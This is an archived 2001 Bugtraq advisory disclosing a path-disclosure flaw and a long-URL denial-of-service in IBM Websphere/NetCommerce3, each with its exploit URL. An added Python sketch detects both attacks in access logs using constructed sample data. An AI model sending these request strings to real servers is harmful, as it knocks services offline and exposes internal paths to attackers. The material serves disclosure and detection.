[20188] in bugtraq


[LoWNOISE] IBM Websphere/NetCommerce3 DoS and one more.

daemon@ATHENA.MIT.EDU (ET LoWNOISE)
Fri Apr 13 02:30:43 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.SUN.3.96.1010413001134.6295A-100000@grex.cyberspace.org>
Date:         Fri, 13 Apr 2001 00:28:48 -0400
Reply-To: ET LoWNOISE <et@CYBERSPACE.ORG>
From: ET LoWNOISE <et@CYBERSPACE.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <5.0.2.1.2.20010409000933.00b69eb8@mail.shagpoint.org>

PRODUCT:  IBM Websphere/NetCommerce3
VERSION:  3.1.2, possibly others (Unix and NT)

+PATH REVEALING PROBLEM
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK

Result:

DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
 in file /usr/NetCommerce3/macros/en_US/macro.d2w

+DoS with Long URL
Exploit:

http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(approx. 1000)..%0a

On UNIX and NT, NetCommerce will crash:
  Server Not Responding

[-----------------------------------------------------------------------]

Efrain 'ET' Torres
et@cyberspace.org
[LoWNOISE] Colombia 2001
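
A detection sketch for the two issues reported above, added here as an example and not part of the original post: it flags ExecMacro requests carrying a long run of encoded newlines (or an oversized URL) in an access log, and extracts the file path disclosed by a DTWP029E error page. The Common Log Format, the thresholds, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumption: NCSA Common Log Format; the post does not name the front-end web server.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
MACRO_PREFIX = "/cgi-bin/ncommerce3/ExecMacro/"
NEWLINE_RUN = re.compile(r"(?:%0a){20,}", re.IGNORECASE)  # assumed threshold
MAX_PATH = 512  # assumed upper bound for a legitimate macro URL
# Error text quoted in the post; the token after "in file" is the leaked path.
LEAK = re.compile(r"DTWP029E:.*?in file\s+(\S+)", re.DOTALL)


def classify_request(log_line):
    """Return a finding label for one access-log line, or None if it looks benign."""
    m = REQUEST.search(log_line)
    if not m or not m.group(1).startswith(MACRO_PREFIX):
        return None
    path = m.group(1)
    if NEWLINE_RUN.search(path):
        return "encoded-newline-run"
    if len(path) > MAX_PATH:
        return "oversized-macro-url"
    return None


def leaked_path(response_body):
    """Return the server-side path disclosed by a Net.Data error page, or None."""
    m = LEAK.search(response_body)
    return m.group(1) if m else None


def scan(log_lines):
    """Return (line_number, label) for every suspicious line, 1-indexed."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        label = classify_request(line)
        if label:
            hits.append((n, label))
    return hits


# Constructed sample data (not taken from a real server).
BASE = '192.0.2.44 - - [13/Apr/2001:00:29:02 -0400] "GET ' + MACRO_PREFIX + "macro.d2w/"
SAMPLE_LOG = [
    BASE + 'report HTTP/1.0" 200 5120',
    BASE + "%0a" * 1000 + ' HTTP/1.0" 500 0',
    '192.0.2.7 - - [13/Apr/2001:00:30:00 -0400] "GET /index.html HTTP/1.0" 200 100',
]
SAMPLE_BODY = ("DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK\n"
               " in file /usr/NetCommerce3/macros/en_US/macro.d2w")

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), leaked_path(SAMPLE_BODY))
```

A non-empty result from `leaked_path` on any page served to clients means the error message is reaching the browser and should be replaced with a generic error page.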
